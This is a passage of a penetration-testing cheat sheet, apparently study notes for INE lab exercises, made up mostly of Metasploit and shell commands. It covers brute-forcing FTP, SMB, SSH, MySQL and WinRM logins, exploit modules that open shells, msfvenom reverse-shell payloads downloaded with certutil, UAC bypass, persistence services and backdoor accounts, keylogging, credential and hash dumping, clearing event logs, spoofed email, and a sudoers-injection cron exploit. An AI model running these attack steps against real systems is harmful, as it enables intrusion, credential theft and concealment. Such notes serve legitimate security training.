DEMOSTARTED UNDER IS DONE AFTER EXPLOITATION***\n\n```shell\nrun autoroute -s \u003cip-address\u003e\n```\n\n\u003e This command can be used add the route to Metasploit's routing table.\n\n***Press CTRL+Z and Enter y to background the meterpreter session in order to run the following command***\n\n```msfconsole\nuse auxiliary/scanner/portscan/tcp\nset RHOSTS demo2.ine.local\nset verbose false\nset ports 1-1000\nexploit\n```\n\n\u003e This module can be used to run a portscan tcp module of Metasploit to scan the second target machine.\n\n```shell\nls -al /usr/bin/nmap\nfile /usr/bin/nmap\n```\n\n\u003e Check the static binaries available in the `/usr/bin/` directory.\n\n```bash\n#!/bin/bash\nfor port in {1..1000}; do\n timeout 1 bash -c \"echo \u003e/dev/tcp/$1/$port\" 2\u003e/dev/null \u0026\u0026 echo \"port $port is open\"\ndone\n```\n\n\u003e Using the script provided at https://catonmat.net/tcp-port-scanner-in-bash as a reference, create a bash script to scan the first 1000 ports\n\n```msfconsole\nsessions -i 1\nupload /usr/bin/nmap /tmp/nmap\nupload /root/bash-port-scanner.sh /tmp/bash-port-scanner.sh\n```\n\n\u003e Background the session and then upload the created shell script.\n\n```shell\nshell\ncd /tmp/\nchmod +x ./nmap ./bash-port-scanner.sh\n./bash-port-scanner.sh demo2.ine.local\n```\n\n\u003e Make the binary and script executable and use the bash script to scan the second target machine.\n\n#### FTP Enumeration:\n\n```msfconsole\nuse auxiliary/scanner/portscan/tcp\nset RHOSTS \u003cip-address\u003e\nset verbose false\nset ports 1-1000\nexploit\n```\n\n\u003e This module can be used to perform a simple port scan on the target machine.\n\n```msfconsole\nsearch type:auxiliary name:ftp\nuse auxiliary/scanner/ftp/ftp_version\nset RHOST \u003cip-address\u003e\nrun\n```\n\n\u003e This can be used to scan the FTP version running on the target.\n\n```msfconsole\nsearch type:auxiliary name:ftp\nuse auxiliary/scanner/ftp/ftp_login\nset RHOST \u003cip-address\u003e\nset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt\nset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt\nrun\n```\n\n\u003e This module can be used to brute force FTP usernames and their respective passwords.\n\n```msfconsole\nsearch type:auxiliary name:ftp\nuse auxiliary/scanner/ftp/anonymous\nset RHOSTS \u003cip-address\u003e\nrun\n```\n\n\u003e This will check whether there is an anonymous login vulnerability.\n\n#### SMB Enumeration:\n\n```msfconsole\nsearch type:auxiliary name:smb\nuse auxiliary/scanner/smb/smb_version\nset RHOSTS \u003cip-address\u003e\nrun\n```\n\n\u003e This will give us the SMB version on the machine.\n\n```msfconsole\nsearch type:auxiliary name:smb\nuse auxiliary/scanner/smb/smb_enumunsers\nset RHOSTS \u003cip-address\u003e\nrun\n```\n\n\u003e It gives us all the users on the machine\n\n```msfconsole\nsearch type:auxiliary name:smb\nuse auxiliary/scanner/smb/smb_enumshares\nset RHOSTS \u003cip-address\u003e\nset ShowFiles true\nrun\n```\n\n\u003e This will give all the shared files and shared details.\n\n```msfconsole\nsearch type:auxiliary name:smb\nuse auxiliary/scanner/smb/smb_login\nset RHOSTS \u003cip-address\u003e\nset SMBUser admin\nset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt\nrun\n```\n\n\u003e This module can be used to brute force the password for particular user `admin` in this case.\n\n```shell\nsmbclient -L \\\\\\\\\u003cip-address\u003e\\\\ -U admin\n```\n\n\u003e After this command a prompt to enter the password will arrive and then after entering the correct password it will list down all the shared files and all.\n\n```Shell\nsmbclient -L \\\\\\\\\u003cip-address\u003e\\\\\u003cshare-name\u003e -U admin\nsmbclient -L \\\\\\\\192.168.33.42\\\\public -U admin\n```\n\n\u003e This can be used to access are particular share.\n\n#### Web Server Enumeration:\n\n```msfconsole\nsearch type:auxiliary name:http\nuse auxiliary/scanner/http/http_version\nset RHOTS \u003cip-address\u003e\nrun\n```\n\n\u003e This is will give the `http` version running on the system.\n\n```msfconsole\nsearch type:auxiliary name:http\nuse auxiliary/scanner/http/http_header\nset RHOSTS \u003cip-address\u003e\nrun\n```\n\n\u003e Tells the data related to the HTTP header.\n\n```msfconsole\nuse auxiliary/scanner/http/robots_txt\nshow options\nset RHOST \u003cip-address\u003e\nrun\n```\n\n\u003e Will show the data of `robots.txt`.\n\n```msfconsole\nuse auxiliary/scanner/http/dir_scanner\nshow options\nset RHOSTS \u003cip-address\u003e\nset DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt\nrun\n```\n\n\u003e This module can be used to enumerate directories.\n\n```msfconsole\nuse auxiliary/scanner/http/files_dir\nshow options\nset RHOSTS \u003cip-address\u003e\nset DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt\nrun\n```\n\n\u003e This can give you the names of different files on the machine\n\n```msfconsole\nuse auxiliary/scanner/http/http_login\nshow options\nset RHOSTS \u003cip-affress\u003e\nset AUTH_URI /\u003cURI\u003e/\nset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt\nset USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt\nset VERBOSE false\nrun\n```\n\n\u003e This will find brute force credentials. \n\n```msfconsole\nuse auxiliary/scanner/http/apache_userdir_enum\nshow options\nset RHOSTS \u003cip-affress\u003e\nset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt\nset VERBOSE fals\nrun\n```\n\n\u003e This can be used to brute force users on the target.\n\n```msfconsole\nuse auxiliary/scanner/http/http_put\nset RHOSTS victim-1\nset PATH /data\nset FILENAME test.txt\nset FILEDATA \"Welcome To AttackDefense\"\nrun\n```\n\n\u003e Using this module write a file on the target server. If the file is already exists it will overwrite it.\n\n```Shell\nwget http://victim-1:80/data/test.txt \ncat test.txt\n```\n\n\u003e Use `wget` and download the `test.txt` file and verify it.\n\n```msfconsole\nuse auxiliary/scanner/http/http_put\nset RHOSTS victim-1\nset PATH /data\nset FILENAME test.txt\nset ACTION DELETE\nrun\n```\n\n\u003e This module can be used to `DELETE` the `test.txt` file.\n\n#### MySQL Enumeration:\n\n```msfconsole\nuse auxiliary/scanner/mysql/mysql_version\nshow options\nset RHOTS \u003cip-address\u003e\nrun\n```\n\n\u003e This module can be used to find the module of the SQL running on the machine.\n\n```msfconsole\nuse auxiliary/scanner/mysql/mysql_login\nshow options\nset RHOTS \u003cip-address\u003e\nset USERNAME root\nset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt\nset VERBOSE false\nrun\n```\n\n\u003e This can be used to brute force my SQL user `root`.\n\n```msfconsole\nuse auxiliary/admin/mysql/mysql_enum\nshow options\nset USERNAME root\nset PASSWORD twinkle\nset RHOTS \u003cip-address\u003e\nrun\n```\n\n***NOTE: THIS MODULE CAN ONLY RUN IF YOU HAVE VALID CREDS OF A USER ACCOUNT***\n\n\u003e This enumerates info. related to the SQL service running on the system.\n\n```msfconsole\nuse auxiliary/admin/mysql/mysql_sql\nshow options\nset USERNAME root\nset PASSWORD twinkle\nset RHOTS \u003cip-address\u003e\nset SQL \u003cany-quary\u003e\nrun\n```\n\n\u003e This module can be used to execute SQL Commands.\n\n```msfconsole\nuse auxiliary/scanner/mysql/mysql_schemadump\nshow options\nset USERNAME root\nset PASSWORD twinkle\nset RHOTS \u003cip-address\u003e\nrun\n```\n\n\u003e This shows tables in the respective tables.\n\n```msfconsole\nuse auxiliary/scanner/mysql/mysql_file_enum\nset USERNAME root\nset PASSWORD twinkle\nset RHOSTS demo.ine.local\nset FILE_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt\nset VERBOSE true\nrun\n```\n\n\u003e This module can be used to enumerate files in a SQL.\n\n```msfconsole\nuse auxiliary/scanner/mysql/mysql_hashdump\nset USERNAME root\nset PASSWORD twinkle\nset RHOSTS demo.ine.local\nrun\n```\n\n\u003e This module dumps all the hashes from the user.\n\n```msfconsole\nuse auxiliary/scanner/mysql/mysql_writable_dirs\nset RHOSTS demo.ine.local\nset USERNAME root\nset PASSWORD twinkle\nset DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt\nrun\n```\n\n\u003e This module gives us the list of all the writeable directories within a machine.\n\n#### SSH Enumeration:\n\n```msfconsole\nuse auxiliary/scanner/ssh/ssh_version\nset RHOSTS \u003cip-address\u003e\nrun\n```\n\n\u003e This system gives the version of SSH running on the machine.\n\n```msfconsole\nuse auxiliary/scanner/ssh/ssh_login\nset RHOTS \u003cip-address\u003e\nset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt\nset PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt\nset VERBOSE false\nrun\n```\n\n\u003e This can be used to brute force username and their passwords.\n\n```msfconsole\nuse auxiliary/scanner/ssh/ssh_enumusers\nset RHOTS \u003cip-address\u003e\nset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt\nrun\n```\n\n\u003e This can be enumerate users on the system.\n\n#### SMTP Enumeration:\n\n```msfconsole\nuse auxiliary/scanner/smtp/smtp_version\nset RHOSTS \u003cip-address\u003e\nrun\n```\n\n\u003e This system gives the version of SMTP running on the machine.\n\n```msfconsole\nuse auxiliary/scanner/smtp/smtp_users\nset RHOTS \u003cip-address\u003e\nset USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt\nrun\n```\n\n\u003e This can be used to brute force usernames.\n\n```shell\nnmap -sV -script banner \u003cip-address\u003e\n```\n\n\u003e This SMTP version tells us about the SMTP server name and banner.\n\n```shell\nnc demo.ine.local 25\n```\n\n\u003e Net Cat can be used to interact with the system.\n\n```console\nVRFY \u003cuser\u003e@\u003cdomain\u003e.xyz\nVRFY commander@openmailbox.xyz\n```\n\n\u003e This can be used to verify a user for a certain domain.\n\n```\ntelnet \u003cip-address\u003e 25\nHELO attacker.xyz\nEHLO attacker.xyz\n```\n\n\u003e This tells us what commands can be used to check the supported commands/capabilities.\n\n```Shell\nsmtp-user-enum -U /usr/share/commix/src/txt/usernames.txt -t \u003cip-address\u003e\n```\n\n\u003e This command can be used to find common users using the tool `smtp-user-enum`\n\n```shell\ntelnet demo.ine.local 25\nHELO attacker.xyz\nmail from: admin@attacker.xyz\nrcpt to:root@openmailbox.xyz\ndata\nSubject: Hi Root\nHello,\nThis is a fake mail sent using telnet command.\nFrom,\nAdmin\n.\n```\n\n\u003e This how we can connect to SMTP service using telnet and send a fake mail to root user. There is a dot(.) in the last line which indicates the termination of data.\n\n```Shell\nsendemail -f admin@attacker.xyz -t root@openmailbox.xyz -s demo.ine.local -u Fakemail -m \"Hi root, a fake from admin\" -o tls=no\n```\n\n\u003e Sending mail through command line.\n\n#### WMAP MSF Plugin commands:\n\n`load wmap`: To load the plugin\n`wmap_sites -a \u003cIP\u003e`: Is can be used to add a site.\n`wmap_sites -l`: Is used to list out all the available sites.\n`wmap_targets -t \u003cURL\u003e`: Is used to add a target URL.\n`wmap_targets -l`: Is used to list out all the targets that are available.\n`wmap_run -t`: This will show all enabled modules.\n`wmap_run -e`: This will start running the vuln. scan.\n`wmap_vuln -l`: This lists all the vulnerabilities that the scan was able to find.\n\n```msfconsole\nuse auxiliary/http/options\nshow options\nset RHOSTS \u003cip-address\u003e\nrun\n```\n\n\u003e This module tells us if the web-application allows different methods like `GET`, `HEAD`, `POST`, and `OPTIONS`.\n\n```msfconsole\nuse auxiliary/http/http_put\nshow options\nset RHOSTS \u003cip-address\u003e\nset PATH /\u003cdirectory\u003e/\nrun\n```\n\n\u003e This can be used to upload a file on to the specified directory.\n\n#### Exploiting WinRM-02\n\n***DEFAULT PORT `5986`***\n\n```msfconsole\nsearch type:auxiliary winrm\nuse auxiliary/winrm/winrm_auth_methods\nset RHOSTS \u003cip-address\u003e\nrun\n```\n\n\u003e This will tell that whether `WinRM` is running on the machine and if it running than what authentication methods are being used.\n\n```msfconsole\nuse auxiliary/winrm/winrm_login\nset RHOST \u003cip-address\u003e\nset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt\nSet PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt\nrun\n```\n\n\u003e This can be used to brute force usernames and their respective passwords.\n\n```msfconsole\nuse auxiliary/winrm/winrm_cmd\nset RHOST \u003cip-address\u003e\nset USERNAME \u003cuser\u003e\nset PASSWORD \u003cpass\u003e\nset CMD whoami\nrun\n```\n\n\u003e This can be used to run commands on the machine\n\n```msfconsole\nuse exploit/windows/winrm/winrm_script_exec\nset RHOST \u003cip-address\u003e\nset USERNAME \u003cuser\u003e\nset PASSWORD \u003cpass\u003e\nset FORCE_VBS true\nrun\n```\n\n\u003e This can be used to obtain a meterpreter session on the service.\n\n#### Exploitation of Tomcat\n\n```msfconsole\nsearch type:exploit tomcat_jsp\nuse exploit/multi/http/tomcat_jsp_upload_bypass\nset RHOST \u003cip-address\u003e\nshow payloads\nset payload java/jsp_shell_bind_tcp\nset SHELL cmd\nexploit\n```\n\n\u003e This will give you a command shell session but not a meterpreter session on the system.\n\n```shell\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=\u003clocal-ip\u003e LPORT=1234 -f exe \u003e meterpreter.exe \n```\n\n\u003e This is a payload file that we will transfer on to the system and then we'll use it to get a meterpreter session.\n\n```shell\nsudo python -m SimpleHTTPServer 80\n```\n\n\u003e Command to start a simple `HTTP File Server`.\n\n```CMD\ncertutil -urlcache -f http://\u003clocal-IP\u003e/meterpreter.exe meterpreter.exe\n```\n\n\u003e This can be used to download the file from the HTTP server with accessing the browser.\n\n```msfconsole\nuse multi/handler\nset PAYLOAD windows/meterpreter/reverse_tcp\nset LHOST \u003clocal-ip\u003e\nset LPORT\nrun\n```\n\n\u003e Set up a multi handler to get a meterpreter shell.\n\n```CMD\n./meterpreter.exe\n```\n\n\u003e Run the script from the java shell and you'll receive a meterpreter session on the msfconsole.\n\n#### VSFTPD Exploitation:\n\n```msfconsole\nsearch vsftpd\nuse 1\nset RHOST \u003cip-address\u003e\nexploit\n```\n\n\u003e Exploit module for `vsftpd 2.3.4`. It gives you rot privileges\n\n```msfconsole\nCTRIL + Z\ny\nuse post/multi/manage/shell_to_meterpreter\nshow options\nset LHOST \u003clocal-ip\u003e\nrun\n```\n\n\u003e It can be used to convert the shell session to a meterpreter session. If it gives an error don't worry you can access the session from the `sessions` command.\n\n#### SAMBA Exploitation\n\n```msfconsole\nsearch type:exploit name:samba\nuse exploit/linux/samba/is_known_pipename\nset RHOST \u003cip-address\u003e\ncheck\nexploit\n```\n\n```msfconsole\nuse exploit/multi/samba/usermap_script\nset RHOSTS demo.ine.local\nexploit\n```\n\n\u003e `check` command can be used to identify whether the system is vulnerable or not. This will give us a command shell session not a meterpreter session so we would have to go it our selves using `shell_to_meterperter` module.\n\n```msfconsole\nCTRIL + Z\ny\nuse post/multi/manage/shell_to_meterpreter\nshow options\nset LHOST \u003clocal-ip\u003e \nset LHOST eth1\nrun\n```\n\n\u003e It can be used to convert the shell session to a meterpreter session. If it gives an error don't worry you can access the session from the `sessions` command.\n\n#### SSH Exploitation:\n\n```msfconsole\nsearch libssh_auth_bypass\nuse 1\nshow options\nset RHOST \u003cip-address\u003e\nset SPAWN_PTY true\nrun\n```\n\n\u003e This can be used to tell weather it is vulnerable and can be used to gain a sell session.\n\n```msfconsole\nCTRIL + Z\ny\nuse post/multi/manage/shell_to_meterpreter\nshow options \nset LHOST eth1\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e It can be used to convert the shell session to a meterpreter session. If it gives an error don't worry you can access the session from the `sessions` command. Other than this you can also use the `sessions -u 1` command to upgrade a shell session into a meterpreter session.\n\n#### SMTP Server Exploitation\n\n```msfconsole\nsearch type:exploit name:haraka\nuse 1\nset rhost \u003cip-address\u003e\nset SEVPORT 9898\nset email_to \u003cemail-address\u003e\nset payload linux/x64/meterpreter_reverse_http\nset LHOST eth1\nrun\n```\n\n\u003e This module after running will give us a meterpreter session. In the module `email_to` should be an email that the server should accept.\n\n#### Meterpreter Commands:\n\n- `sysinfo`: This gives us basic system info like the OS, PC Name and all\n- `getuid`: This command tells us about our permissions.\n- `help`: This gives all the commands and their details.\n- `backgroud`: This is used to put the session in background.\n- `edit \u003cfile-name\u003e`: To edit a file\n- `kill`: This will kill the current session.\n- `checksum MD5 /bin/bash`: To check the md5 hash in bin/bash directory.\n- `search -d /dir/path -f \"\u003cfile-name\u003e\"`: This command can be used to find a particular file in a directory.\n- `search -f *.exe`: This can be used to find all the `exe` file or any extension that you'll enter.\n- `download \u003cfile-name\u003e`: This can be used to download a file.\n- `shell`: This can be used to pop the native shell of the machine.\n- `ps`: This can be used to list down all the processes.\n- `migrate \u003cpid\u003e`: This can be used to migrate to any current running processes.\n- `mkdir \u0026 rmdir`: Use to create and delete directory.\n- `getsystem:` This command can be used to automatically elevate the privileges of the current exploited user on **windows**.\n- `screenshot:` This command can be used to click a screenshot of the **windows screen**.\n- `hashdump`: This command can be used to dump all the hashes of passwords with in the SAM DB.\n- `show_mount`: This will tell all the disks mounted with the windows user.\n- `loot`: After that you have ran some enumeration modules you can find the data saved in texts using this command\n- `getprivs`: This is you to check the current privilages to perticular user.\n- `shell\u003e net users`: This tells the users.\n- `shell\u003e net localgroup administrators`: This tell what user is the part of administartor and can perform the task of administrator.\n\n#### Windows Post Exploitation Module:\n\n```msfconsole\nuse post/windows/manage/migrate\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This module can be used to create a new process and then migrate into it. If you already have migrated then this would not work.\n\n```msfconsole\nuse post/windows/gather/win_privs\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This is list out all the privileges that the current exploitered user have.\n\n```\nuse post/windows/gather/enum_logged_on_users\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will list all the currently and recently logged on users.\n\n```msfconsole\nuse post/windows/gather/checkvm\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will tell us weather that machine is a VM or not.\n\n```msfconsole\nuse post/windows/gather/enum_applications\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This lists down all the application and their respective versions installed on the machine so that they can be used to further exploit and elevate the privileges.\n\n```msfconsole\nuse post/windows/gather/enum_av_excluded\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This module can be used to list out all the directories that are currently not looked after by the AV or the Win Defender.\n\n```msfconsole\nuse post/windows/gather/enum_computers\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will tell us whether the machine is a stand alone machine or a machine that is part of a domain.\n\n```msfconsole\nuse post/windows/gather/enum_patches\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will give us the patches that being installed in the machine. You can also do this by typing the `shell \u003e systeminfo` command as it is a native windows command.\n\n```msfconsole\nuse post/windows/gather/enum_shares\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will lists all the shares within the machine.\n\n```msfconsole\nuse post/windows/manage/enable_rdp\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will tell us whether `RDP` is enabled on the machine or not. If it isn't enabled than it will enable it by it self.\n\n#### Bypassing UAC Through Memory Injection:\n\n***EVERYTHING DEMOSTARTED BELOW IS DONE AFTER THE FIRST FOOTHOLD HAS BE GAINED***\n\n```\nCtrl + Z\ny\nuse exploit/windows/local/bypassuac_injection\nset SESSION \u003csession-id\u003e\nset LPORT 4433\nset TARGET windows\\ x64\nset PAYLOAD windows/x64/meterpreter/reverse_tcp\nrun\n```\n\n\u003e This will bypass UAC using the injection method.\n\n***NOW THIS WILL NOT ELEVATE OUR PRIVILAGES BUT WILL GIVE A NEW METERPRETER SESSION THAT WILL HAVE THE UAC FLAG TURNED OFF AND AFTER THAT YOU CAN USE THE*** **`getsystem`** ***COMMAND TO ELIVATE YOUR PRIVILEGES***\n\n#### Establishing Persistence on Windows:\n\n```msfconsole\nuse exploit/windows/local/persistence_service\nset payload windows/meterpreter/reverse_tcp\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will startup a service that we can always connect to via a handler after the current session is terminated.\n\n```msfconsole\nuse multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LHOST eth1\nrun\n```\n\n\u003e Now if you run this you'll immediately get a meterpreter sessions.\n\n***ALWAYS KEEP IN MIND THE*** **`LHOST`** ***AND*** **`LPORT`** ***OPTIONS***\n\n#### Enabling RDP\n\n```msfconsole\nuse post/windows/manage/enable_rdp\nshow options\nset RHOSTS \u003cip-address\u003e\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will enable the `RDP` service on port `3389`. \n\n***NOW AFTER THIS WE WOULD HAVE TO CHANGE THE PASSWORD IN ***\n\n```msfconsole\nshell\nnet users\nnet user administrator \u003cpassword-any\u003e\n```\n\n\u003e This will change the password of the `administrator` user. This can only be done via a privileged access.\n\n```shell\nxfreerdp /u:administrator /p:\u003cpassword-any\u003e /v:\u003cip-address\u003e\n```\n\n\u003e This command can be used from the console of your linux machine in order to interact with the `RCD` of the target machine using the new creds.\n\n#### Windows Keylogging:\n\n***FIRST MIGRATE TO*** **`explorer`** ***PROCESS AND THEN RUN THE KEYLOGGER.***\n\n```msfconsole\npgrep explorer\nmigrate \u003cpid\u003e\n```\n\n\u003e Migration to `explorer`\n\n`keyscan_start`: This will start the key stroke sniffer.\n`keyscan_dump`: This will dump all the captured key strokes.\n\n#### Clearing Windows Logs:\n\n**Note:**\n\n\u003e Everything demonstrated here after is basically done after the initial foothold.\n\n`clearev`: This command in the meterpreter is used to clear the event logs of the machine.\n\n#### Pivoting:\n\n```msfconsole\nrun autoroute -s 10.0.16.0/20\n```\n\n\u003e This command can be used to set route from one network to another network. First type `ifconfig` or `ipconfig` to check all the possible interfaces on the machine.\n\n```msfconsole\nbackground\nuse auxiliary/scanner/portscan/tcp\nset RHOSTS demo2.ine.local\nset PORTS 1-100\nexploit\n```\n\n\u003e This module can be then used to run a port scan on the machine who's network route we have just added.\n\n```msfconsole\nsessions -i 1\nportfwd add -l 1234 -p 80 -r demo2.ine.local\nportfwd list\n```\n\n\u003e These set of commands can be used to port forward a port of the target machine on to a port of `localhost`.\n\n```shell\nnmap -sV -sS -p 1234 localhost\n```\n\n\u003e Now you can run a scan the target machines port using this command.\n\n#### Linux Post Exploitation Modules\n\n- `cat /etc/passwd`: This command lists out all the users and service accounts on the machine and needs `root` privileges to execute.\n- `getuid`: If uid is 0 it mean root user\n- `groups \u003cusername\u003e`: This will tell you which user group the entered username belongs to.\n- `bin/bash -i`: This command can be used to get a bash shell after meterpreter session is opened.\n- `cat /etc/*issue`: This will tell you the release version of the machine.\n- `uname -r`: This tells the kernel version:\n- `ps aux`: This command lists down all the processes running on the system.\n- `env:` This tells all the environment valuables for the current logged in user.\n\n```msfconsole\nuse post/linux/gather/enum_configs\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will give addresses of all the configuration files on the machine.\n\n```msfconsole\nuse post/linux/gather/env\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will show all the env related data like versions and all.\n\n```msfconsole\nuse post/linux/gather/enum_network\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will give all the network related data and configuration files.\n\n```msfconsole\nuse post/linux/gather/enum_protections\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This module checks all the basic system hardening methods are in place or not.\n\n```msfconsole\nuse post/linux/gather/enum_system\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This gathers system and user infos.\n\n```msfconsole\nuse post/linux/gather/checkcontainer\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will check whether we are in a container or an actual machine.\n\n```msfconsole\nuse post/linux/gather/checkvm\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This will tell that weather the machine is a VM or an actual machine.\n\n```msfconsole\nuse post/linux/gather/enum_users_history\nshow options\nset SESSION \u003csession-id\u003e\nrun\n```\n\n\u003e This lists down all the users history and commands that a specific user ran. It is saved in `loot` as well and you can access the saved data from there as well.\n\n```msfconsole\nuse post/multi/manage/system_session\nset SESSION \u003csession-id\u003e\nset TYPE python\nset HANDLER true\nset LHOST \u003chost-ip\u003e\nrun\n```\n\n\u003e This module will create a Reverse TCP Shell on the target system using the system's own scripting environments installed on the target.\n\n#### FUN STUFF\n\n```bash\nuseradd hacker\nuseradd test\nuseradd nick\n```\n\n\u003e Create a file with the following data and name it as `test.sh`.\n\n```shell\n/etc/init.d/apache2 start\ncp test.sh /var/www/html\n```\n\n\u003e Turn the `apache2` and copy the created file in the `/var/www/html` directory\n\n```msfconsole\nuse post/linux/manage/download_exec\nset URL http://\u003cHOST-IP\u003e/test.sh\nset SESSION 1\nrun\n```\n\n\u003e Now use this module to download and run the file on the target machine.\n\n```msfconsole\nsessions -i 1\ncat /etc/passwd\n```\n\n\u003e Now after the execution three users will be created you can check them using the following commands.\n\n#### Linux Privilege Escalation: Exploiting a vulnerable program (chkrootkkit)\n\n***IT DEPENDS ON THE VERSION OF THE LINUX KERNEL RUNNINGON THE MACHINE AND THE DISTRIBUTION VERSION***\n\n```ruby\nsessions -u \u003csession-id\u003e\n```\n\n\u003e This command can be used to upgrade your current session into a meterpreter session and if it gives you can error then don't worry you can check the new session from the `sessions` command and than load the new one.\n - `ps aux` use this to check the running process\n\n```bash\nchkrootkit -V\n```\n\n\u003e This can be used to check the rootkit version running on the linux machine.\n\n***VERSIONS OLDER THAN 0.50 OF THE CHKROOTKIT ARE VULNARABLE TO LOCAL PRIVELAGE ESCALATION VULNARABILITY***\n\n```msfconsole\nsearch exploit/unix/local/chkrootkit\nshow options\nset CHKROOTKIT /path/to/file (see by using ps aux and check the process by cat command and open)\nset SESSION \u003csession-id\u003e\nset LHOST \u003clocalhost-ip\u003e\nexploit\n```\n\n\u003e This will exploit the vulnerability by creating a cron job.\n\n\n#### Linux Password Hash (exploit-ProFTPD)\n\n```shell\n/etc/passwd\ncat /etc/shadow (only read my root user)\n```\n\u003e all passsword is store\n\n**determine by $ sign**\n- $1 - MD5\n- $2 - blowfish\n- $5 - SHA-256\n- $6 - SHA-512\n\n```shell\nservice postgresql start\nmsfconsole\nuse exploit/unix/ftp/proftpd_133c_backdoor\nset RHORTS \u003ctarget-IP\u003e\nset payload payload/cmd/unix/reverse\nexploit\n/bin/bash -i\nbackground\nsessions -u \u003cid\u003e\n```\n\u003e this is use to get the root of linux\n\n**Use `use post/linux/gather/hashdump` module to decode the hash by enter session id**\n\n```shell\nuse auxiliary/analyze/crack_linux\n```\n\u003e this is also use to decode the hash of password\n\n```shell\nuse exploit/Linux/gather/hashdump\nset sessions\nrun\n```\n\u003e Use `loot` to see the password hash store in file and by simple cat command we see password hash\n\n```shell\npost/multi/gather/ssh_creds\npost/multi/gather/docker_creds\npost/linux/gather/ecryptfs_creds\npost/linux/gather/enum_psk\npost/linux/gather/enum_xchat -\u003e (set XCHAT true)\npost/linux/gather/phpmyadmin_credsteal\npost/linux/gather/pptpd_chap_secrets\npost/linux/manage/sshkey_persistence\n```\n\u003e more usefull module\n\n#### Linux Privilege Escalation\n\n```url\ngithub.com/mzet-/linux-exploit-suggester\n```\n\u003e github repository\n\n```shell\nwget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh\n```\n\n***after get the meterperter session***\n```shell\nupload ~/Desktop/Linux-Enum/les.sh\nshell\nbin/bash -i\nchmod +x les.sh\n./les.sh\n```\n\u003e this tell the list of exploits. by this we get the privilage of linux\n\n#### Establishing Persistence On Linux\n\n**Only use in root user**\n\u003e First get the root use by exploit the service running and then sessions to meterpreter and then use chkrootkkit exploit the root and then upgrade to meterpreter to get the root user\n\n\u003e this will not be required if you have a root user access\n\n```shell\nshell\n/bin/bash -i\nuseradd -m \u003cuser-name\u003e -s /bin/bash\npasswd \u003cuser-name\u003e (set the password of that user)\n```\n- This is backdoor\n- set the username is like `ftp`\n\u003e This will only run the target use ssh and remote access protocol\n\n```shell\ngroups root\n```\n\u003e this is use to check the username that is the part of root or not\n\n```shell\nusermod -aG root \u003cuser-name\u003e\n```\n\u003e this is add the user in the root group\n\n***Another Way***\n\n```shell\nsearch platform:linux persistence\nuse exploit/linux/local/cron_persistence\nset session\nrun\n```\n\n```shell\nuse exploit/linux/local/service_persistence\nset session\nset payload cmd/unix/reverse_python\nset target 4\nrun\n```\n\n```shell\nuse post/linux/manage/sshkey_persistence\nset createsshfolder true\nset session\nrun\n```\n- recommended\n\n\u003e this also give us private key (use `loot` to see the path)just copy it and exit the msfconsole. Create a new file `nano ssh_key` and add that key.\n\n```shell\nchmod 0400 ssh_key\nssh -i ssh_key root@\u003ctarget-IP\u003e\n```\n\n#### Exploiting Misconfigured Cron Jobs \u0026 exploit copy.sh\n\n\u003e corbtab file is configuration file in linux\n\n```shell\ngrep -nri \"/tmp/\u003cfile-name\u003e\" /usr\n```\n\u003e Check the permissions on this script file and its contents.\n\n```shell\ncat /usr/local/share/copy.sh\nprintf '#! /bin/bash\\necho \"student ALL=NOPASSWD:ALL\" \u003e\u003e /etc/sudoers' \u003e /usr/local/share/copy.sh\nsudo su\n```\n\n\u003e On execution, these lines will add a new entry to the /etc/sudoers file which will allow the student user to use sudo without providing any password.\n\n#### Exploiting SUID Binaries\n\n```shell\nls -al\n```\n\u003e if you see `s` in permissions than it give SUID permissions\n\n```shell\nstrings \u003cfile-name\u003e\n```\n\u003e in this we wrtie a that file that have `s` permissions. see if if called some binary like greetings binary so replace the greetings binary with some other binary (say /bin/bash) which should then also get executed as root.\n\n```shell\nrm greetings\ncp /bin/bash greetings\n./\u003cfile-name\u003e\n```\n\n#### Exploit HTPP file server rejetto\n\n```shell\nmsfconsole\nuse exploit/windows/http/rejetto_hfs_exec\nset 